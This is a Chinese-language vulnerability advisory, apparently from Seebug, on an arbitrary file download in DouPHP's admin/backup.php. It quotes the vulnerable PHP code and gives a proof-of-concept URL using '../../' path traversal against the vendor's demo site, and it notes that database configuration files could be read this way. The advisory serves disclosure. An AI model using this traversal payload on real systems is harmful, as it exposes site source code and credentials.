### 简要描述: 任意文件下载,漏洞文件:admin/backup.php 可以下载整站文件源码,官网测试站通过。 ### 详细说明: 漏洞文件 admin/backup.php 第187行开始。 /** +---------------------------------------------------------- * 备份下载 +---------------------------------------------------------- */ if ($_REQUEST['rec'] == 'down') { $sql_file_name = $dou->addslashes_deep($_GET['sql_file_name']); ob_clean(); if ($fp = @ fopen("../data/backup/" . $sql_file_name, 'r')) { header("Content-type: application/zip"); header("Content-Disposition: attachment; filename=" . $sql_file_name); header("Accept-Ranges: bytes"); header("Content-Length:" . filesize("backup/" . $sql_file_name)); header('Content-transfer-encoding: binary'); while (!@ feof($fp)) echo fread($fp, 10240); } } PS:进入此函数需要后台管理员权限 用途?在某些地方,读取数据库配置文件等等。利用再难也不能忽略这是一个漏洞 ### 漏洞证明: http://demo.douco.com/admin/backup.php?rec=down&sql_file_name=../../captcha.php [<img src="https://images.seebug.org/upload/201405/13193736bfdbf7d016f3d702b5d3bc6f33f0ea48.jpg" alt="QQ拼音截图未命名.jpg" width="600"...
### 简要描述: 任意文件下载,漏洞文件:admin/backup.php 可以下载整站文件源码,官网测试站通过。 ### 详细说明: 漏洞文件 admin/backup.php 第187行开始。 /** +---------------------------------------------------------- * 备份下载 +---------------------------------------------------------- */ if ($_REQUEST['rec'] == 'down') { $sql_file_name = $dou->addslashes_deep($_GET['sql_file_name']); ob_clean(); if ($fp = @ fopen("../data/backup/" . $sql_file_name, 'r')) { header("Content-type: application/zip"); header("Content-Disposition: attachment; filename=" . $sql_file_name); header("Accept-Ranges: bytes"); header("Content-Length:" . filesize("backup/" . $sql_file_name)); header('Content-transfer-encoding: binary'); while (!@ feof($fp)) echo fread($fp, 10240); } } PS:进入此函数需要后台管理员权限 用途?在某些地方,读取数据库配置文件等等。利用再难也不能忽略这是一个漏洞 ### 漏洞证明: http://demo.douco.com/admin/backup.php?rec=down&sql_file_name=../../captcha.php [<img src="https://images.seebug.org/upload/201405/13193736bfdbf7d016f3d702b5d3bc6f33f0ea48.jpg" alt="QQ拼音截图未命名.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/13193736bfdbf7d016f3d702b5d3bc6f33f0ea48.jpg) [<img src="https://images.seebug.org/upload/201405/1319380019186303cdccee91d5bbf193d58fd46f.jpg" alt="QQ拼音截图未命名.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1319380019186303cdccee91d5bbf193d58fd46f.jpg)
